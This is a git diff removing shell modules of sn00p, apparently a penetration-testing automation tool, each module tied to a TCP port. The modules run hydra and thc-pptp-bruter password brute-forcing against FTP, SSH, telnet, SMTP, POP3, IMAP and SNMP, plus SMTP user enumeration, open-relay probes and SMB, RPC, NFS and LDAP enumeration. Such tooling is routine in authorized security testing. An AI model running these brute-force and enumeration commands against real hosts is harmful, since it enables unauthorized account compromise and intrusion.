a/automation/sn00p/source/src/modules/tcp/110.sh b/automation/sn00p/source/src/modules/tcp/110.sh deleted file mode 100644 index 87b1fd5..0000000 --- a/automation/sn00p/source/src/modules/tcp/110.sh +++ /dev/null 
@@ -1,142 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_pop3() -{ - opts="-e nsr -f -v" - - for user in ${ULISTS} - do - for pass in ${PLISTS} - do - hydra ${opts} -L ${user} -P ${pass} pop3://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/111.sh b/automation/sn00p/source/src/modules/tcp/111.sh deleted file mode 100644 index fced537..0000000 --- a/automation/sn00p/source/src/modules/tcp/111.sh +++ /dev/null 
@@ -1,147 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get remote rpc services via rpcinfo -# TOOLS: rpcinfo -do_rpcinfo() -{ - opts="-p" - - rpcinfo ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get logged in users over rusersd via rusers -# TOOLS: rusers -do_rusers() -{ - opts="-l" - - rusers ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/113.sh b/automation/sn00p/source/src/modules/tcp/113.sh deleted file mode 100644 index 45671b4..0000000 --- a/automation/sn00p/source/src/modules/tcp/113.sh +++ /dev/null 
@@ -1,145 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# try to get version of identd via netcat -# TOOLS: nc -do_ident_version() -{ - echo "version" | nc -vv -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# try to get onwer of running proccess via nmap ident scan -# TOOLS: nmap -do_ident_scan() -{ - opts="-n -I -PN" - - nmap ${opts} -p ${DPORT} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/135.sh b/automation/sn00p/source/src/modules/tcp/135.sh deleted file mode 100644 index d12dfe2..0000000 --- a/automation/sn00p/source/src/modules/tcp/135.sh +++ /dev/null 
@@ -1,133 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# try to get infos over msrpc endpoint mapper via rpcdump.py -# TOOLS: rpcdump.py -do_rpcdump() -{ - rpcdump.py ${DHOST} "135/TCP" 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/139.sh b/automation/sn00p/source/src/modules/tcp/139.sh deleted file mode 100644 index 592d6c0..0000000 --- a/automation/sn00p/source/src/modules/tcp/139.sh +++ /dev/null 
@@ -1,179 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# audit netbios via nbaudit -# TOOLS: nbaudit -do_nbaudit() -{ - nbaudit ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan for netbios infos via nbtscan -# TOOLS: nbtscan -do_nbtscan() -{ - opts="-v -r" - - nbtscan ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan for netbios infos via nmbscan -# TOOLS: nmbscan -do_nmbscan() -{ - opts="-h" - - nmbscan ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# try to get infos over msrpc endpoint mapper via rpcdump.py -# TOOLS: rpcdump.py -do_rpcdump() -{ - rpcdump.py ${DHOST} "139/SMB" 2>&1 - - return ${SUCCESS} -} - - -# try to get as much as possible via enum4linux -# TOOLS: enum4linux -do_enum4linux() -{ - opts="-a" - - enum4linux ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/143.sh b/automation/sn00p/source/src/modules/tcp/143.sh deleted file mode 100644 index c6fcedc..0000000 --- a/automation/sn00p/source/src/modules/tcp/143.sh +++ /dev/null 
@@ -1,141 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_imap() -{ - opts="-e nsr -f -v" - - for user in ${ULISTS} - do - for pass in ${PLISTS} - do - hydra ${opts} -L ${user} -P ${pass} imap://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/1521.sh b/automation/sn00p/source/src/modules/tcp/1521.sh deleted file mode 100644 index b58d19b..0000000 --- a/automation/sn00p/source/src/modules/tcp/1521.sh +++ /dev/null 
@@ -1,139 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get infos about clients connected to mounted dirs via showmount -# TOOLS: tnscmd -do_tnscmd10g() -{ - # <= 9 - tnscmd ping ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - echo - - # now for 10g - tnscmd ping ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/161.sh b/automation/sn00p/source/src/modules/tcp/161.sh deleted file mode 100644 index e8f18c0..0000000 --- a/automation/sn00p/source/src/modules/tcp/161.sh +++ /dev/null 
@@ -1,174 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get infos over version 1 via snmpwalk -# TOOLS: snmpwalk -do_snmpwalk_v1() -{ - opts="-v 1 -c public" - - snmpwalk ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get infos over version 2 via snmpwalk -# TOOLS: snmpwalk -do_snmpwalk_v2() -{ - opts="-c public -v 2c" - - snmpwalk ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get infos via onesixtyone -# TOOLS: onesixtyone -do_onesixtyone() -{ - opts="-d" - - onesixtyone ${opts} ${DHOST} "public" - - return ${SUCCESS} -} - - -# bruteforce via hydra -# TOOLS: hydra -do_hydra_snmp() -{ - opts="-e nsr -f -v" - - for pass in ${PLISTS} - do - hydra ${opts} -P ${pass} "snmp://${DHOST}" 2>&1 - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/1723.sh b/automation/sn00p/source/src/modules/tcp/1723.sh deleted file mode 100644 index 0089be4..0000000 --- a/automation/sn00p/source/src/modules/tcp/1723.sh +++ /dev/null 
@@ -1,139 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -# bruteforce logins via thc-pptp-bruter -# TOOLS: thc-pptp-bruter -do_thc_pptp_bruter() -{ - for ulist in ${ULISTS} - do - for user in `cat ${ulist}` - do - for plist in ${PLISTS} - do - thc-pptp-bruter -p ${DPORT} -u ${user} -w ${plist} 2>&1 - done - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/2049.sh b/automation/sn00p/source/src/modules/tcp/2049.sh deleted file mode 100644 index 3999ca4..0000000 --- a/automation/sn00p/source/src/modules/tcp/2049.sh +++ /dev/null 
@@ -1,147 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get exported shares / directories via showmount -# TOOLS: showmount -do_showmount() -{ - opts="-e" - - showmount ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get infos about clients connected to mounted dirs via showmount -# TOOLS: showmount -do_showmount_clients() -{ - opts="-a" - - showmount ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/21.sh b/automation/sn00p/source/src/modules/tcp/21.sh deleted file mode 100644 index 2d2a3cc..0000000 --- a/automation/sn00p/source/src/modules/tcp/21.sh +++ /dev/null 
@@ -1,162 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# anonymous login via netcat -# TOOLS: ncat -do_anon_login_ncat() -{ - echo -e "USER anonymous\r\nPASS ftp@ftp.net" | - ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# fingerprint via ftpmap -# TOOLS: ftpmap -do_ftpmap() -{ - ftpmap -P ${DPORT} -s ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_ftp() -{ - opts="-e nsr -f -v" - - for i in ${ULISTS} - do - for j in ${PLISTS} - do - hydra ${opts} -L ${i} -P ${j} ftp://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/22.sh b/automation/sn00p/source/src/modules/tcp/22.sh deleted file mode 100644 index 58052f8..0000000 --- a/automation/sn00p/source/src/modules/tcp/22.sh +++ /dev/null 
@@ -1,153 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# verify SSH daemon and read banner -# TOOLS: nc -do_verify_ssh() -{ - opts="-vv -w 3" - - echo "SSH-2.0-OpenSSH" | nc ${opts} ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_ssh() -{ - opts="-e nsr -f -v" - - for i in ${ULISTS} - do - for j in ${PLISTS} - do - hydra ${opts} -L ${i} -P ${j} ssh://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/23.sh b/automation/sn00p/source/src/modules/tcp/23.sh deleted file mode 100644 index b5a1355..0000000 --- a/automation/sn00p/source/src/modules/tcp/23.sh +++ /dev/null 
@@ -1,141 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_telnet() -{ - opts="-e nsr -f -v" - - for i in ${ULISTS} - do - for j in ${PLISTS} - do - hydra ${opts} -L ${i} -P ${j} telnet://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/2483.sh b/automation/sn00p/source/src/modules/tcp/2483.sh deleted file mode 100644 index 0abbff9..0000000 --- a/automation/sn00p/source/src/modules/tcp/2483.sh +++ /dev/null 
@@ -1,139 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get infos about clients connected to mounted dirs via showmount -# TOOLS: tnscmd -do_tnscmd10g() -{ - # <= 9 - tnscmd ping ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - echo - - # now for 10g - tnscmd ping ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/25.sh b/automation/sn00p/source/src/modules/tcp/25.sh deleted file mode 100644 index d1ddb0e..0000000 --- a/automation/sn00p/source/src/modules/tcp/25.sh +++ /dev/null 
@@ -1,243 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# module globals -domain="`head -1 ../../host/default/domain.log 2> /dev/null`" -user1="root" -user2="sn00p" - - -# check if user enumeration is possible via VRFY using smtp-user-enum -# TOOLS: smtp-user-enum -do_vrfy_scan() -{ - opts1="-v -M VRFY -u root -f localhost" - opts2="-v -M VRFY -u root -f localhost -D ${domain}" - - if [ -z "${DPORT}" ] - then - DPORT="25" - fi - - # first try user guessing (without domain - smtp-user-enum ${opts1} -p ${DPORT} -t ${DHOST} 2>&1 - - # try email addr guessing - smtp-user-enum ${opts2} -p ${DPORT} -t ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# check for existing users via RCPT TO using smtp-user-enum -# TOOLS: smtp-user-enum -do_rcpt_scan() -{ - opts1="-v -M RCPT -u root -f localhost" - opts2="-v -M RCPT -u root -f localhost -D ${domain}" - - if [ -z "${DPORT}" ] - then - DPORT="25" - fi - - # first try user guessing (without domain - smtp-user-enum ${opts1} -p ${DPORT} -t ${DHOST} 2>&1 - - # try email addr guessing - smtp-user-enum ${opts2} -p ${DPORT} -t ${DHOST} 2>&1 - - - 
return ${SUCCESS} -} - - -# check for existing users via EXPN using smtp-user-enum -# TOOLS: smtp-user-enum -do_expn_scan() -{ - opts1="-v -M EXPN -u root -f localhost" - opts2="-v -M EXPN -u root -f localhost -D ${domain}" - - if [ -z "${DPORT}" ] - then - DPORT="25" - fi - - # first try user guessing (without domain - smtp-user-enum ${opts1} -p ${DPORT} -t ${DHOST} 2>&1 - - # try email addr guessing - smtp-user-enum ${opts2} -p ${DPORT} -t ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# check for open relay -# TOOLS: ncat -do_open_relay() -{ - ehlo="mail.google.com" - sender="" - reciever="" - - echo -e "ehlo ${ehlo}\r\nmail from: ${sender}\r\nrcpt to: ${reciever}\r\n"\ - "data\r\nfoobar\r\n." | ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# fingerprint server via smtpscan -# TOOLS: smtpscan -do_smtpscan() -{ - # smtpscan options - fprint_file="/usr/share/smtpscan/fingerprints" - test_file="/usr/share/smtpscan/tests" - - smtpscan -f ${fprint_file} -t ${test_file} -p ${DPORT} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_smtp() -{ - opts="-e nsr -f -v" - - for i in ${ULISTS} - do - for j in ${PLISTS} - do - hydra ${opts} -L ${i} -P ${j} smtp://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/3268.sh b/automation/sn00p/source/src/modules/tcp/3268.sh deleted file mode 100644 index d7610af..0000000 --- a/automation/sn00p/source/src/modules/tcp/3268.sh +++ /dev/null 
@@ -1,134 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# gather LDAP / AD information via ldapenum -do_ldapenum() -{ - opts="-U -G -E -v" - - ldapenum.pl ${opts} -i ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/32771.sh b/automation/sn00p/source/src/modules/tcp/32771.sh deleted file mode 100644 index 0636f31..0000000 --- a/automation/sn00p/source/src/modules/tcp/32771.sh +++ /dev/null 
@@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF 